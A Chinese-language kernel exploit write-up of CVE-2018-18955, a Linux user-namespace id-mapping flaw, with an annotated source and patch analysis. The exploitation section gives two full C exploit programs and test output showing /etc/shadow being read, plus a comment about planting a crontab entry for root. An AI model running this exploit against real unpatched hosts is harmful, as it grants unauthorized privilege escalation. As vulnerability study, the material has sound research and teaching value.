【kernel exploit】CVE-2018-18955 用户命名空间逻辑错误

仲孙夕

2023-12-01

影响版本：Linux 4.15.x~4.19.1（4.19.2已修补，4.19.1未修补）。CVSS评分：7.0分。

测试版本：Linux-4.19.1 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory

编译选项：CONFIG_USER_NS CONFIG_SLAB=y

General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB

在编译时将.config中的CONFIG_E1000和CONFIG_E1000E，变更为=y。参考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.19.1.tar.xz
$ tar -xvf linux-4.19.1.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录：/arch/x86/boot/bzImage。

漏洞描述：kernel/user_namespace.c中的 map_write() 错误处理了嵌套的user namespace（UID或GID映射超过5个范围/extent时），如果用户在受影响的user namespace中拥有CAP_SYS_ADMIN权限，就能绕过访问控制，访问到namespace之外的资源，例如/etc/shadow。

map_write() 的功能是根据用户输入的映射关系和父NS的权限来确定当前NS的映射关系。首先，用户通过/proc/self/uid_map来设置映射关系（每一行用一个 uid_gid_extent 结构来存储），然后map_write() 会先对输入的这些 uid_gid_extent 进行排序，然后用父ns的权限来更新用户设置的映射关系（保证进程所具有的权限不会超过父ns的权限），关键是在排序时还复制了一个数组 map->reverse，但更新权限时只更新了 map->forward，导致后续别的函数通过 map->reverse 来判断权限时出错。 user namespace逻辑漏洞。

补丁：patch。漏洞代码先调用 sort_idmaps() 进行排序，会产生两个排序后的数组 map->forward 和 map->reverse （reverse是对forward拷贝之后再排序得到的），而之后的循环只更新了 map->forward；所以补丁所作的修改是，在循环修改了 map->forward 之后再调用 sort_idmaps() 进行排序，这样 map->reverse 拷贝到的就是修改后的版本。

diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
index e5222b5fb4fe6..923414a246e9e 100644
--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
 	if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
 		goto out;
 
-	ret = sort_idmaps(&new_map);
-	if (ret < 0)
-		goto out;
-
 	ret = -EPERM;
 	/* Map the lower ids from the parent user namespace to the
 	 * kernel global id space.
@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
 		e->lower_first = lower_first;
 	}
 
+	/*
+	 * If we want to use binary search for lookup, this clones the extent
+	 * array and sorts both copies.
+	 */
+	ret = sort_idmaps(&new_map);
+	if (ret < 0)
+		goto out;
+
 	/* Install the map */
 	if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
 		memcpy(map->extent, new_map.extent,

保护机制：开启KASLR/SMEP/SMAP。

利用总结：由于必须安装uidmap软件包（提供newuidmap/newgidmap），所以我无法在自己编译的bzImage中进行测试。如果有办法在busybox文件系统中安装uidmap，就能进行测试。利用方法就是借助漏洞获得root权限，读取/etc/shadow。

一、背景知识

用户命名空间：用于隔离安全相关的标识符和属性的命名空间，主要是uid、gid、根目录、密钥、capabilities（权能）。一个进程在自己的用户命名空间内可以是高权限，在命名空间外是低权限。嵌套用户命名空间，就是一个 user namespace 的子 namespace。本漏洞利用创建 nested user namespace 时错误的id映射来达到提权目的。

uid/gid映射：该机制保证了 nested user namespace 中，进程所具有的权限不会逾越父ns的范围。man newuidmap得到如下内容：

uid：用户命名空间内UIDs范围的开头。
loweruid：用户命名空间外的UIDs范围的开头。
count：用户命名空间内外的范围的长度。

向 /proc/<pid>/uid_map 和 /proc/<pid>/gid_map 文件写入值，就能映射系统和namespace中的uid/gid。第1个字段ID-inside-ns表示在命名空间内的UID或GID；第2个字段ID-outside-ns表示在命名空间外的真实UID或GID；第3个字段表示映射的范围，一般填1，表示一一对应。每一行id映射都用一个 uid_gid_extent 结构表示。

# 示例: 把真实的uid=1000映射成容器内的uid=0
$ cat /proc/2465/uid_map
0       1000          1

写入限制：

在linux4.14之前只能写入5行，在4.15之后，可以达到340行；
写这两个文件的进程需要这个namespace中的CAP_SETUID (CAP_SETGID)权限（可参看Capabilities）；
写入的进程必须是此user NS的父或子的user NS进程；
另外需要满足如下条件之一：1）父进程将effective uid/gid映射到子进程的user NS中，2）父进程如果有CAP_SETUID/CAP_SETGID权限，那么它将可以映射到父进程中的任一uid/gid。

loweruid 限制：newuidmap 验证caller是pid指示的进程的所有者，设置/proc/[pid]/uid_map前，根据 /etc/subuid，[loweruid, loweruid+count]范围内的UID都能映射。

# john @ john-XPS-13-9360 in ~
$ cat /etc/subuid
john:100000:65536
# 所以我可以创建像 0 100000 1000这样的mapping

二、漏洞分析

调用链：proc_uid_map_write() -> map_write() -> mappings_overlap() insert_extent() sort_idmaps() map_id_range_down() ->

// Confirms that this is the implementation of writes to the /proc/<pid>/uid_map file.
// https://elixir.bootlin.com/linux/v4.19.1/source/fs/proc/base.c#L2814
// Later in the same file there is also:  REG("uid_map",    S_IRUGO|S_IWUSR, proc_uid_map_operations)
static const struct file_operations proc_uid_map_operations = {
	.open		= proc_uid_map_open,
	.write		= proc_uid_map_write,			// <---------- write handler analysed below
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= proc_id_map_release,
};

2.1 源码分析

// (1) proc_uid_map_write()
/*
 * Write handler installed as .write in proc_uid_map_operations.
 *
 * Rejects the write with -EPERM when the target namespace has no parent,
 * or when the namespace returned by seq_user_ns() is neither the target
 * namespace nor its parent.  Otherwise the request is handed to
 * map_write() with CAP_SETUID, the target namespace's uid_map and the
 * parent namespace's uid_map.
 */
ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
			   size_t size, loff_t *ppos)
{
	struct seq_file *m = file->private_data;
	struct user_namespace *target_ns = m->private;
	/* presumably the user namespace of whoever opened the file -- confirm */
	struct user_namespace *opener_ns = seq_user_ns(m);
	struct user_namespace *parent_ns = target_ns->parent;

	/* A namespace without a parent cannot have its map written. */
	if (parent_ns == NULL)
		return -EPERM;

	/* Only the namespace itself or its direct parent may write. */
	if (opener_ns != target_ns && opener_ns != parent_ns)
		return -EPERM;

	/* Last two arguments: the map to fill in, and the parent's map. */
	return map_write(file, buf, size, ppos, CAP_SETUID,
			 &target_ns->uid_map, &parent_ns->uid_map);
}
// struct user_namespace  ->  struct uid_gid_map	uid_map;	The map is defined below; uid_gid_extent matches the line format of /proc/<pid>/uid_map and friends. Before Linux 4.15 the limit was (arbitrarily) 5 lines; from Linux 4.15 on the limit is 340 lines.  With up to 5 lines the data is stored directly in extent[]; with more than 5 it lives in the memory that forward points to.
struct uid_gid_map { /* 64 bytes -- 1 cache line */
	u32 nr_extents;		/* number of extents currently in the map */
	union {
		/* inline storage, used while nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS */
		struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS];
		/* out-of-line storage, used for larger maps */
		struct {
			struct uid_gid_extent *forward;	/* the array map_write() walks and rewrites */
			struct uid_gid_extent *reverse;	/* second copy produced by sort_idmaps() */
		};
	};
};
#define UID_GID_MAP_MAX_BASE_EXTENTS 5	/* extents that fit in the inline extent[] array */
#define UID_GID_MAP_MAX_EXTENTS 340	/* upper bound on extents per map */
struct uid_gid_extent {			// each uid_gid_extent represents one line of an id mapping
    u32 first;		/* 1st field of the line: first id inside the namespace */
    u32 lower_first;	/* 2nd field of the line: first id outside the namespace */
    u32 count;		/* 3rd field of the line: length of the mapped range */
};

// (2) map_write()
/*
 * Parse a user-supplied id mapping and install it into @map.
 *
 * NOTE: this is the vulnerable v4.19.1 version, reproduced for analysis.
 * sort_idmaps() at [3] runs before the loop at [4] rewrites lower_first,
 * so for maps with more than UID_GID_MAP_MAX_BASE_EXTENTS extents the
 * reverse copy keeps the untranslated values.  The upstream fix moves the
 * sort_idmaps() call to just before "Install the map".
 *
 * Returns @count on success or a negative errno.
 */
static ssize_t map_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos,
			 int cap_setid,
			 struct uid_gid_map *map,	// map is the uid_gid_map of the namespace being configured; it is derived from the user-supplied buf (written to /proc/self/uid_map) and parent_map.
			 struct uid_gid_map *parent_map)
{
	struct seq_file *seq = file->private_data;
	struct user_namespace *ns = seq->private;
	struct uid_gid_map new_map;
	unsigned idx;
	struct uid_gid_extent extent;
	char *kbuf = NULL, *pos, *next_line;
	ssize_t ret;

	/* Only allow < page size writes at the beginning of the file */
	if ((*ppos != 0) || (count >= PAGE_SIZE))
		return -EINVAL;

	/* Slurp in the user data */
	kbuf = memdup_user_nul(buf, count);			// [1] kbuf -- kernel-side buffer holding a copy of the user data
	if (IS_ERR(kbuf))
		return PTR_ERR(kbuf);

	/*
	 * The userns_state_mutex serializes all writes to any given map.
	 *
	 * Any map is only ever written once.
	 *
	 * An id map fits within 1 cache line on most architectures.
	 *
	 * On read nothing needs to be done unless you are on an
	 * architecture with a crazy cache coherency model like alpha.
	 *
	 * There is a one time data dependency between reading the
	 * count of the extents and the values of the extents.  The
	 * desired behavior is to see the values of the extents that
	 * were written before the count of the extents.
	 *
	 * To achieve this smp_wmb() is used on guarantee the write
	 * order and smp_rmb() is guaranteed that we don't have crazy
	 * architectures returning stale data.
	 */
	mutex_lock(&userns_state_mutex);

	memset(&new_map, 0, sizeof(struct uid_gid_map));

	ret = -EPERM;
	/* Only allow one successful write to the map */
	if (map->nr_extents != 0)
		goto out;

	/*
	 * Adjusting namespace settings requires capabilities on the target.
	 */
	if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN))
		goto out;

	/* Parse the user data */
	ret = -EINVAL;
	pos = kbuf;
	for (; pos; pos = next_line) {				// [2] Parse the user input line by line into extent, then call the two key helpers mappings_overlap() and insert_extent().

		/* Find the end of line and ensure I don't look past it */
		next_line = strchr(pos, '\n');
		if (next_line) {
			*next_line = '\0';
			next_line++;
			if (*next_line == '\0')
				next_line = NULL;
		}

		pos = skip_spaces(pos);
		extent.first = simple_strtoul(pos, &pos, 10);
		if (!isspace(*pos))
			goto out;

		pos = skip_spaces(pos);
		extent.lower_first = simple_strtoul(pos, &pos, 10);
		if (!isspace(*pos))
			goto out;

		pos = skip_spaces(pos);
		extent.count = simple_strtoul(pos, &pos, 10);
		if (*pos && !isspace(*pos))
			goto out;

		/* Verify there is not trailing junk on the line */
		pos = skip_spaces(pos);
		if (*pos != '\0')
			goto out;

		/* Verify we have been given valid starting values */
		if ((extent.first == (u32) -1) ||
		    (extent.lower_first == (u32) -1))
			goto out;

		/* Verify count is not zero and does not cause the
		 * extent to wrap
		 */
		if ((extent.first + extent.count) <= extent.first)
			goto out;
		if ((extent.lower_first + extent.count) <=
		     extent.lower_first)
			goto out;

		/* Do the ranges in extent overlap any previous extents? */
		if (mappings_overlap(&new_map, &extent))	// [2-1] mappings_overlap() checks whether extent overlaps anything already stored in new_map and returns true if it does.
			goto out;

		if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS &&
		    (next_line != NULL))
			goto out;

		ret = insert_extent(&new_map, &extent);		// [2-2] insert_extent() adds one uid_gid_extent to the uid_gid_map.
		if (ret < 0)
			goto out;
		ret = -EINVAL;
	}
	/* Be very certaint the new map actually exists */
	if (new_map.nr_extents == 0)		// Everything so far only copied and validated the input; the parsed extents now live in new_map.
		goto out;

	ret = -EPERM;
	/* Validate the user is allowed to use user id's mapped to. */
	if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
		goto out;

	ret = sort_idmaps(&new_map);			// [3] sort_idmaps(): sorts only when there are more than 5 extents; per the analysis in this article it also kmemdup()s a second copy, sorts that one by lower_first, and stores it in map->reverse.
	if (ret < 0)
		goto out;

	ret = -EPERM;
	/* Map the lower ids from the parent user namespace to the
	 * kernel global id space.
	 */
	for (idx = 0; idx < new_map.nr_extents; idx++) { 	// [4] Replace each new_map lower_first with the value translated through parent_map. new_map is the nested namespace being set up; lower_first is the start id in the parent ns. Walks the input and calls map_id_range_down() for each extent.
		struct uid_gid_extent *e;
		u32 lower_first;

		if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
			e = &new_map.extent[idx];
		else
			e = &new_map.forward[idx];

		lower_first = map_id_range_down(parent_map,		// [4-1] Argument 1 is the parent namespace's uid_gid_map; arguments 2 and 3 are the start id and length of the range in the parent namespace.
						e->lower_first,
						e->count);

		/* Fail if we can not map the specified extent to
		 * the kernel global id space.
		 */
		if (lower_first == (u32) -1)
			goto out;

		e->lower_first = lower_first;					// [4-2] Update lower_first of this uid_gid_extent in new_map. 		// VULNERABILITY: the lower_first ids in new_map->forward are now updated, but the ones in new_map->reverse are left unchanged.
	}

	/* Install the map */
	if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {	// [5] Write-back. map is the current namespace's uid_gid_map and new_map is the freshly built one; this step copies new_map into map (the proc file can be written only once and starts out empty). Error handling follows.
		memcpy(map->extent, new_map.extent,
		       new_map.nr_extents * sizeof(new_map.extent[0]));
	} else {
		map->forward = new_map.forward;
		map->reverse = new_map.reverse;
	}
	smp_wmb();
	map->nr_extents = new_map.nr_extents;

	*ppos = count;
	ret = count;
out:
	/* On failure, release the out-of-line arrays and reset the target map. */
	if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) {
		kfree(new_map.forward);
		kfree(new_map.reverse);
		map->forward = NULL;
		map->reverse = NULL;
		map->nr_extents = 0;
	}

	mutex_unlock(&userns_state_mutex);
	kfree(kbuf);
	return ret;
}

// (2-1) mappings_overlap() -- per the article (body not shown here): walks the uid_gid_map, takes each stored uid_gid_extent and compares it with extent, checking both the upper and lower bound of the ranges; when nr_extents is greater than 5 the extents are read through the forward pointer.
static bool mappings_overlap(struct uid_gid_map *new_map,
                 struct uid_gid_extent *extent);
// (2-2) insert_extent() -- per the article (body not shown here): when the insertion index is 5, allocates room for 340 uid_gid_extent structures and copies the first 5 extents into it; then appends extent at the end and increments map->nr_extents by 1.
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent);

// (3) map_id_range_down()
/*
 * Translate the range [id, id + count) through @map.
 *
 * Looks up an extent of @map for the range (small maps go through
 * map_id_range_down_base(), larger ones through map_id_range_down_max(),
 * which the article describes as a binary-search wrapper) and, when one is
 * found, rebases @id from the extent's `first` onto its `lower_first`.
 *
 * Returns the translated start id, or (u32) -1 when no extent was found.
 */
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count)
{
	/* Read the extent count first; the barrier orders it before the lookup. */
	unsigned nr = map->nr_extents;
	struct uid_gid_extent *hit;

	smp_rmb();

	hit = (nr <= UID_GID_MAP_MAX_BASE_EXTENTS)
		? map_id_range_down_base(nr, map, id, count)
		: map_id_range_down_max(nr, map, id, count);

	/* Note failure */
	if (!hit)
		return (u32) -1;

	/* Offset of id inside the extent, rebased onto the lower id space. */
	return (id - hit->first) + hit->lower_first;
}

2.2 漏洞分析

排序：前面的 sort_idmaps() 函数中（ map_write() 的[3]处），当数据数目大于5时，还创建了一个 map->reverse 的副本，进行了排序，之后就没再更改过，最后将这个内存地址赋值给了map。

这两种排序方式的区别：forward是用uid_gid_extent->first字段来进行排序，而reverse是利用uid_gid_extent->lower_first字段进行排序。

/*
 * Comparison callback ordering extents by their `first` field:
 * returns -1, 0 or 1 when a sorts before, equal to, or after b.
 */
static int cmp_extents_forward(const void *a, const void *b)
{
    const struct uid_gid_extent *lhs = a;
    const struct uid_gid_extent *rhs = b;

    /* (greater) - (less) yields exactly -1, 0 or 1 */
    return (lhs->first > rhs->first) - (lhs->first < rhs->first);
}

/*
 * Comparison callback for sorting the reverse mappings: orders extents by
 * their `lower_first` field, returning -1, 0 or 1.
 */
static int cmp_extents_reverse(const void *a, const void *b)
{
    const struct uid_gid_extent *lhs = a;
    const struct uid_gid_extent *rhs = b;

    /* (greater) - (less) yields exactly -1, 0 or 1 */
    return (lhs->lower_first > rhs->lower_first) -
           (lhs->lower_first < rhs->lower_first);
}

漏洞：在前面调用 map_id_range_down() 的for循环中，更新了 e->lower_first 的值，而e是通过forward来找到的，所以最终只更新了forward中的值，reverse中的值没有被更改，仍然是用户传进来的原始值。假设先有一个命名空间n1，把自己的root用户映射到内核中的普通用户；然后n1再创建一个命名空间n2，并把n1的root映射为n2的root。这样在n2的uid_map中，forward指向的uid_gid_extent的第2项（lower_first）被更新了，但是reverse指向的副本没有被更改，还保持root到root的映射，所以凡是通过这个reverse来判断uid的地方就会出现权限提升。

接下来的问题是：这个reverse数组到底在哪里被用到，又是用来做什么的？

根据作者的介绍，kernel/user_namespace.c 中对reverse的引用出现在 from_kuid() 的调用路径上；kuid_has_mapping() 调用 from_kuid() 来判断某个kuid是否被映射，而 kuid_has_mapping() 又被类似于 inode_owner_or_capable() 和 privileged_wrt_inode_uidgid() 这样的权限检查函数所使用。就是说，内核在判断进程的实际权限时需要使用reverse。假设这样一个场景：当一个容器中的进程访问文件时，需要判断该进程是否有权限；当文件在命名空间之内时，需要查看进程在容器内的权限，所以要通过内核的kuid去反查它在命名空间内对应的uid。

关于kuid_has_mapping()的使用方法其实可以参考unshare的实现，代码从unshare的系统调用服务例程开始，调用流程如下

1、kernel/fork.c/SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)

2、kernel/user_namespace.c/unshare_userns

3、kernel/user_namespace.c/create_user_ns

4、kernel/user_namespace.c/kuid_has_mapping

三、漏洞利用

引用map->reverse调用链：privileged_wrt_inode_uidgid() -> kgid_has_mapping() -> from_kgid() -> map_id_up() -> map_id_up_max() -> map->reverse 。在这种权限检查函数中， from_kgid() 返回错误的id，造成权限检查的错误，因此攻击者可以意外得到他们本来没有权限的inode的权限。

利用EXP：第一部分是 subuid_shell.c，它通过普通的unshare调用来创建一个新的用户命名空间，主要流程如下：

1、父进程fork子进程，之后父进程等待，子进程调用unshare创建一个新的用户命名空间

2、子进程创建新的命名空间后等待，父进程通过newuidmap/newgidmap写入uid_map等文件，设立映射关系

3、父进程等待，子进程调用setgid(0)/setuid(0)后执行bash

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * subuid_shell: start a shell as uid/gid 0 inside a fresh user namespace.
 *
 * The child unshares into a new user namespace and then waits; the parent
 * installs the id mappings with the newuidmap/newgidmap helpers and signals
 * the child over a socket pair; the child then becomes uid/gid 0 inside the
 * namespace and execs bash.
 *
 * Returns 0 after the child exits; any failure terminates via err()/errx().
 */
int main(void)
{
    int sync_pipe[2];
    char dummy;
    // a socket pair is used (not a pipe) because both sides read and write
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "socketpair");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        // tell the parent the namespace exists, then wait for the mappings
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    // wait until the child has created its namespace
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    // snprintf bounds every command to the buffer size
    char cmd[1000];
    snprintf(cmd, sizeof(cmd), "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    snprintf(cmd, sizeof(cmd), "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    snprintf(cmd, sizeof(cmd), "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    // mappings are in place: release the child
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

然后是 subshell.c ，主要流程同上，只是这里由父进程直接写入子进程的 uid_map/gid_map，并且写入的映射数据不同，为什么是这些数据可以参考前面的漏洞分析部分。

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * subshell: create a nested user namespace whose id maps have 6 extents.
 *
 * The child unshares into a new user namespace and waits; the parent writes
 * the same 6-line mapping to the child's uid_map and gid_map directly and
 * then signals the child, which execs bash.
 *
 * Returns 0 after the child exits; any failure terminates via err().
 */
int main(void)
{
    // our new id mapping with 6 extents (> 5 extents)
    // kept as an array so its length is known at compile time
    static const char id_mapping[] =
        "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
    const ssize_t map_len = (ssize_t)(sizeof(id_mapping) - 1);

    int sync_pipe[2];
    char dummy;
    // a socket pair is used (not a pipe) because both sides read and write
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "socketpair");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");

        // wait until the parent has written the id maps
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    // wait until the child has created its namespace
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of the child's /proc directory
    snprintf(pbuf, sizeof(pbuf), "/proc/%d", (int)child);

    // cd to /proc/<pid> so uid_map and gid_map can be opened by relative name
    if (chdir(pbuf))
        err(1, "chdir");

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, (size_t)map_len) != map_len)
        err(1, "write uid map");
    close(uid_map);
    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, (size_t)map_len) != map_len)
        err(1, "write gid map");
    close(gid_map);

    // mappings are in place: release the child
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

测试：在Ubuntu 18.04 上进行测试，因为QEMU中制作文件系统时无法安装uidmap。需安装"uidmap" 包，目标是读取 /etc/shadow。

$ sudo apt-get install uidmap		# 这样就包含/usr/bin/newuidmap 和 /usr/bin/newgidmap
$ cat /etc/subuid			# john:100000:65536
$ cat /etc/subgid			# john:100000:65536
$ gcc -o subuid_shell subuid_shell.c	# subuid_shell.c 使用newuidmap helper来设置一个ns，maps 1000 UIDs starting at 100000 to the namespaced UID 0； 
$ gcc -o subshell subshell.c		# subshell.c 需要 CAP_SYS_ADMIN 权限，创建一个user ns，使用6个 extent 来 maps UIDs 0-999
$ id 				# 1000普通权限
$ ./subuid_shell 
# id 				# 提权
	uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
# cat /proc/self/uid_map		# 0     100000       1000
	     0     100000       1000
# cat /etc/shadow			# 无权限读取
	cat: /etc/shadow: Permission denied
# ./subshell 
$ id
	uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
$ cat /proc/self/uid_map		# 6行（对应写入的6个extent）
$ cat /etc/shadow 			# 可以读取
	root:!:18102:0:99999:7:::

参考

exploit

CVE-2018-18955：较新Linux内核的提权神洞分析

CVE-2018-18955漏洞学习

【kernel exploit】CVE-2018-18955 用户命名空间逻辑错误

一、背景知识

二、漏洞分析

2.1 源码分析

2.2 漏洞分析

三、漏洞利用

参考

相关阅读

相关文章

相关问答

相关文档